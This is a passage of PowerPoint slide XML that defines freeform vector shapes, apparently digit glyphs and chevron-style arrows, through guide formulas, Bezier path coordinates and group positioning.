                  <a:gd name="T28" fmla="*/ 55 w 111"/>
                  <a:gd name="T29" fmla="*/ 30 h 194"/>
                  <a:gd name="T30" fmla="*/ 42 w 111"/>
                  <a:gd name="T31" fmla="*/ 40 h 194"/>
                  <a:gd name="T32" fmla="*/ 37 w 111"/>
                  <a:gd name="T33" fmla="*/ 73 h 194"/>
                  <a:gd name="T34" fmla="*/ 37 w 111"/>
                  <a:gd name="T35" fmla="*/ 120 h 194"/>
                  <a:gd name="T36" fmla="*/ 42 w 111"/>
                  <a:gd name="T37" fmla="*/ 154 h 194"/>
                  <a:gd name="T38" fmla="*/ 55 w 111"/>
                  <a:gd name="T39" fmla="*/ 164 h 194"/>
                  <a:gd name="T40" fmla="*/ 56 w 111"/>
                  <a:gd name="T41" fmla="*/ 164 h 194"/>
                  <a:gd name="T42" fmla="*/ 69 w 111"/>
                  <a:gd name="T43" fmla="*/ 154 h 194"/>
                  <a:gd name="T44" fmla="*/ 74 w 111"/>
                  <a:gd name="T45" fmla="*/ 120 h 194"/>
                  <a:gd name="T46" fmla="*/ 74 w 111"/>
                  <a:gd name="T47" fmla="*/ 73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1" h="194">
                    <a:moveTo>
                      <a:pt x="111" y="117"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="142"/>
                      <a:pt x="106" y="162"/>
                      <a:pt x="96" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="188"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="194"/>
                      <a:pt x="25" y="188"/>
                      <a:pt x="15" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="0" y="142"/>
                      <a:pt x="0" y="11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52"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="15" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="86" y="6"/>
                      <a:pt x="96" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="32"/>
                      <a:pt x="111" y="52"/>
                      <a:pt x="111" y="77"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="58"/>
                      <a:pt x="72" y="47"/>
                      <a:pt x="69" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="61" y="30"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="30"/>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="47"/>
                      <a:pt x="37" y="58"/>
                      <a:pt x="37" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="136"/>
                      <a:pt x="39" y="147"/>
                      <a:pt x="42" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="161"/>
                      <a:pt x="49" y="164"/>
                      <a:pt x="55" y="164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62" y="164"/>
                      <a:pt x="66" y="161"/>
                      <a:pt x="69" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="147"/>
                      <a:pt x="74" y="136"/>
                      <a:pt x="74" y="120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="7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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940667" y="3710770"/>
                <a:ext cx="145640" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 115"/>
                  <a:gd name="T1" fmla="*/ 81 h 194"/>
                  <a:gd name="T2" fmla="*/ 56 w 115"/>
                  <a:gd name="T3" fmla="*/ 81 h 194"/>
                  <a:gd name="T4" fmla="*/ 71 w 115"/>
                  <a:gd name="T5" fmla="*/ 74 h 194"/>
                  <a:gd name="T6" fmla="*/ 75 w 115"/>
                  <a:gd name="T7" fmla="*/ 54 h 194"/>
                  <a:gd name="T8" fmla="*/ 71 w 115"/>
                  <a:gd name="T9" fmla="*/ 36 h 194"/>
                  <a:gd name="T10" fmla="*/ 57 w 115"/>
                  <a:gd name="T11" fmla="*/ 29 h 194"/>
                  <a:gd name="T12" fmla="*/ 44 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 194"/>
                  <a:gd name="T14" fmla="*/ 39 w 115"/>
                  <a:gd name="T15" fmla="*/ 51 h 194"/>
                  <a:gd name="T16" fmla="*/ 3 w 115"/>
                  <a:gd name="T17" fmla="*/ 51 h 194"/>
                  <a:gd name="T18" fmla="*/ 3 w 115"/>
                  <a:gd name="T19" fmla="*/ 50 h 194"/>
                  <a:gd name="T20" fmla="*/ 18 w 115"/>
                  <a:gd name="T21" fmla="*/ 14 h 194"/>
                  <a:gd name="T22" fmla="*/ 56 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 97 w 115"/>
                  <a:gd name="T25" fmla="*/ 14 h 194"/>
                  <a:gd name="T26" fmla="*/ 112 w 115"/>
                  <a:gd name="T27" fmla="*/ 54 h 194"/>
                  <a:gd name="T28" fmla="*/ 106 w 115"/>
                  <a:gd name="T29" fmla="*/ 77 h 194"/>
                  <a:gd name="T30" fmla="*/ 87 w 115"/>
                  <a:gd name="T31" fmla="*/ 94 h 194"/>
                  <a:gd name="T32" fmla="*/ 108 w 115"/>
                  <a:gd name="T33" fmla="*/ 111 h 194"/>
                  <a:gd name="T34" fmla="*/ 115 w 115"/>
                  <a:gd name="T35" fmla="*/ 139 h 194"/>
                  <a:gd name="T36" fmla="*/ 98 w 115"/>
                  <a:gd name="T37" fmla="*/ 179 h 194"/>
                  <a:gd name="T38" fmla="*/ 56 w 115"/>
                  <a:gd name="T39" fmla="*/ 194 h 194"/>
                  <a:gd name="T40" fmla="*/ 17 w 115"/>
                  <a:gd name="T41" fmla="*/ 180 h 194"/>
                  <a:gd name="T42" fmla="*/ 1 w 115"/>
                  <a:gd name="T43" fmla="*/ 140 h 194"/>
                  <a:gd name="T44" fmla="*/ 1 w 115"/>
                  <a:gd name="T45" fmla="*/ 139 h 194"/>
                  <a:gd name="T46" fmla="*/ 37 w 115"/>
                  <a:gd name="T47" fmla="*/ 139 h 194"/>
                  <a:gd name="T48" fmla="*/ 43 w 115"/>
                  <a:gd name="T49" fmla="*/ 157 h 194"/>
                  <a:gd name="T50" fmla="*/ 57 w 115"/>
                  <a:gd name="T51" fmla="*/ 165 h 194"/>
                  <a:gd name="T52" fmla="*/ 72 w 115"/>
                  <a:gd name="T53" fmla="*/ 157 h 194"/>
                  <a:gd name="T54" fmla="*/ 78 w 115"/>
                  <a:gd name="T55" fmla="*/ 138 h 194"/>
                  <a:gd name="T56" fmla="*/ 72 w 115"/>
                  <a:gd name="T57" fmla="*/ 116 h 194"/>
                  <a:gd name="T58" fmla="*/ 56 w 115"/>
                  <a:gd name="T59" fmla="*/ 109 h 194"/>
                  <a:gd name="T60" fmla="*/ 37 w 115"/>
                  <a:gd name="T61" fmla="*/ 109 h 194"/>
                  <a:gd name="T62" fmla="*/ 37 w 115"/>
                  <a:gd name="T63" fmla="*/ 81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5" h="194">
                    <a:moveTo>
                      <a:pt x="37" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="81"/>
                      <a:pt x="67" y="78"/>
                      <a:pt x="71" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="75" y="62"/>
                      <a:pt x="75" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="47"/>
                      <a:pt x="74" y="41"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="31"/>
                      <a:pt x="63" y="29"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="48" y="31"/>
                      <a:pt x="44" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="39"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="51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3" y="36"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="4"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="87" y="4"/>
                      <a:pt x="97" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="23"/>
                      <a:pt x="112" y="36"/>
                      <a:pt x="112" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="62"/>
                      <a:pt x="110" y="70"/>
                      <a:pt x="106" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="85"/>
                      <a:pt x="95" y="90"/>
                      <a:pt x="87" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="98"/>
                      <a:pt x="103" y="104"/>
                      <a:pt x="108" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="119"/>
                      <a:pt x="115" y="128"/>
                      <a:pt x="115" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="156"/>
                      <a:pt x="109" y="169"/>
                      <a:pt x="98" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="189"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="194"/>
                      <a:pt x="27" y="189"/>
                      <a:pt x="17" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="171"/>
                      <a:pt x="0" y="158"/>
                      <a:pt x="1" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="147"/>
                      <a:pt x="39" y="153"/>
                      <a:pt x="43" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="162"/>
                      <a:pt x="51" y="165"/>
                      <a:pt x="57" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="165"/>
                      <a:pt x="68" y="162"/>
                      <a:pt x="72" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="153"/>
                      <a:pt x="78" y="146"/>
                      <a:pt x="78" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="128"/>
                      <a:pt x="76" y="121"/>
                      <a:pt x="72" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="112"/>
                      <a:pt x="63" y="109"/>
                      <a:pt x="56" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="8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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="115" name="Group 114"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6689747" y="2796314"/>
              <a:ext cx="960664" cy="592366"/>
              <a:chOff x="6689747" y="2796314"/>
              <a:chExt cx="960664" cy="592366"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6689747" y="2796314"/>
                <a:ext cx="960664" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 427 w 686"/>
                  <a:gd name="T1" fmla="*/ 423 h 423"/>
                  <a:gd name="T2" fmla="*/ 218 w 686"/>
                  <a:gd name="T3" fmla="*/ 423 h 423"/>
                  <a:gd name="T4" fmla="*/ 0 w 686"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 427 w 686"/>
                  <a:gd name="T7" fmla="*/ 0 h 423"/>
                  <a:gd name="T8" fmla="*/ 686 w 686"/>
                  <a:gd name="T9" fmla="*/ 210 h 423"/>
                  <a:gd name="T10" fmla="*/ 427 w 686"/>
                  <a:gd name="T11" fmla="*/ 423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86" h="423">
                    <a:moveTo>
                      <a:pt x="427" y="423"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="423"/>
                    </a:ln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" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6706552" y="2829923"/>
                <a:ext cx="890645" cy="523747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 0 h 374"/>
                  <a:gd name="T2" fmla="*/ 407 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 374"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 186 h 374"/>
                  <a:gd name="T6" fmla="*/ 407 w 636"/>
                  <a:gd name="T7" fmla="*/ 374 h 374"/>
                  <a:gd name="T8" fmla="*/ 192 w 636"/>
                  <a:gd name="T9" fmla="*/ 374 h 374"/>
                  <a:gd name="T10" fmla="*/ 0 w 636"/>
                  <a:gd name="T11" fmla="*/ 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36" h="374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="407" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="116" name="Group 115"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5149324" y="2014895"/>
              <a:ext cx="1054490" cy="642780"/>
              <a:chOff x="5149324" y="2014895"/>
              <a:chExt cx="1054490" cy="642780"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5149324" y="2014895"/>
                <a:ext cx="1054490" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 278 w 753"/>
                  <a:gd name="T1" fmla="*/ 459 h 459"/>
                  <a:gd name="T2" fmla="*/ 475 w 753"/>
                  <a:gd name="T3" fmla="*/ 459 h 459"/>
                  <a:gd name="T4" fmla="*/ 753 w 753"/>
                  <a:gd name="T5" fmla="*/ 0 h 459"/>
                  <a:gd name="T6" fmla="*/ 278 w 753"/>
                  <a:gd name="T7" fmla="*/ 0 h 459"/>
                  <a:gd name="T8" fmla="*/ 0 w 753"/>
                  <a:gd name="T9" fmla="*/ 214 h 459"/>
                  <a:gd name="T10" fmla="*/ 278 w 753"/>
                  <a:gd name="T11" fmla="*/ 459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3" h="459">
                    <a:moveTo>
                      <a:pt x="278" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="475" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="459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" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5199738" y="2044303"/>
                <a:ext cx="985871" cy="585364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 252 w 704"/>
                  <a:gd name="T1" fmla="*/ 418 h 418"/>
                  <a:gd name="T2" fmla="*/ 0 w 704"/>
                  <a:gd name="T3" fmla="*/ 194 h 418"/>
                  <a:gd name="T4" fmla="*/ 251 w 704"/>
                  <a:gd name="T5" fmla="*/ 0 h 418"/>
                  <a:gd name="T6" fmla="*/ 704 w 704"/>
                  <a:gd name="T7" fmla="*/ 0 h 418"/>
                  <a:gd name="T8" fmla="*/ 452 w 704"/>
                  <a:gd name="T9" fmla="*/ 418 h 418"/>
                  <a:gd name="T10" fmla="*/ 252 w 704"/>
                  <a:gd name="T11" fmla="*/ 418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4" h="418">
                    <a:moveTo>
                      <a:pt x="252" y="418"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="418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17" name="Group 116"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7441754" y="4331144"/>
              <a:ext cx="1013878" cy="614772"/>
              <a:chOff x="7441754" y="4331144"/>
              <a:chExt cx="1013878" cy="614772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7441754" y="4331144"/>
                <a:ext cx="1013878" cy="614772"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 465 w 724"/>
                  <a:gd name="T1" fmla="*/ 438 h 439"/>
                  <a:gd name="T2" fmla="*/ 218 w 724"/>
                  <a:gd name="T3" fmla="*/ 439 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 439"/>
                  <a:gd name="T6" fmla="*/ 465 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 439"/>
                  <a:gd name="T8" fmla="*/ 724 w 724"/>
                  <a:gd name="T9" fmla="*/ 217 h 439"/>
                  <a:gd name="T10" fmla="*/ 465 w 724"/>
                  <a:gd name="T11" fmla="*/ 438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4" h="439">
                    <a:moveTo>
                      <a:pt x="465" y="438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="438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" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7459959" y="4366153"/>
                <a:ext cx="942459" cy="543352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 673"/>
                  <a:gd name="T1" fmla="*/ 0 h 388"/>
                  <a:gd name="T2" fmla="*/ 444 w 673"/>
                  <a:gd name="T3" fmla="*/ 0 h 388"/>
                  <a:gd name="T4" fmla="*/ 673 w 673"/>
                  <a:gd name="T5" fmla="*/ 193 h 388"/>
                  <a:gd name="T6" fmla="*/ 444 w 673"/>
                  <a:gd name="T7" fmla="*/ 388 h 388"/>
                  <a:gd name="T8" fmla="*/ 192 w 673"/>
                  <a:gd name="T9" fmla="*/ 388 h 388"/>
                  <a:gd name="T10" fmla="*/ 0 w 673"/>
                  <a:gd name="T11" fmla="*/ 0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3" h="388">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="118" name="Group 117"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4429526" y="2014895"/>
              <a:ext cx="3753031" cy="4082143"/>
              <a:chOff x="4429526" y="2014895"/>
              <a:chExt cx="3753031" cy="4082143"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2014895"/>
                <a:ext cx="389307" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 278"/>
                  <a:gd name="T1" fmla="*/ 420 h 459"/>
                  <a:gd name="T2" fmla="*/ 278 w 278"/>
                  <a:gd name="T3" fmla="*/ 0 h 459"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 459 h 459"/>
                  <a:gd name="T6" fmla="*/ 201 w 278"/>
                  <a:gd name="T7" fmla="*/ 420 h 459"/>
                  <a:gd name="T8" fmla="*/ 201 w 278"/>
                  <a:gd name="T9" fmla="*/ 420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8" h="459">
                    <a:moveTo>
                      <a:pt x="201" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420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" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877524" y="2196946"/>
                <a:ext cx="260472" cy="420118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 186"/>
                  <a:gd name="T1" fmla="*/ 0 h 300"/>
                  <a:gd name="T2" fmla="*/ 134 w 186"/>
                  <a:gd name="T3" fmla="*/ 273 h 300"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 186 w 186"/>
                  <a:gd name="T7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6" h="300">
                    <a:moveTo>
                      <a:pt x="186" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186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" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6095984" y="2014895"/>
                <a:ext cx="481732" cy="623174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 344"/>
                  <a:gd name="T1" fmla="*/ 420 h 445"/>
                  <a:gd name="T2" fmla="*/ 77 w 344"/>
                  <a:gd name="T3" fmla="*/ 0 h 445"/>
                  <a:gd name="T4" fmla="*/ 344 w 344"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 0 w 344"/>
                  <a:gd name="T7" fmla="*/ 420 h 445"/>
                  <a:gd name="T8" fmla="*/ 0 w 344"/>
                  <a:gd name="T9" fmla="*/ 420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4" h="445">
                    <a:moveTo>
                      <a:pt x="0" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6133794" y="2108721"/>
                <a:ext cx="385106" cy="495739"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 275"/>
                  <a:gd name="T1" fmla="*/ 334 h 354"/>
                  <a:gd name="T2" fmla="*/ 62 w 275"/>
                  <a:gd name="T3" fmla="*/ 0 h 354"/>
                  <a:gd name="T4" fmla="*/ 275 w 275"/>
                  <a:gd name="T5" fmla="*/ 354 h 354"/>
                  <a:gd name="T6" fmla="*/ 0 w 275"/>
                  <a:gd name="T7" fmla="*/ 334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5" h="354">
                    <a:moveTo>
                      <a:pt x="0" y="334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2603060"/>
                <a:ext cx="763210" cy="85424"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 545"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 545 w 545"/>
                  <a:gd name="T3" fmla="*/ 25 h 61"/>
                  <a:gd name="T4" fmla="*/ 351 w 545"/>
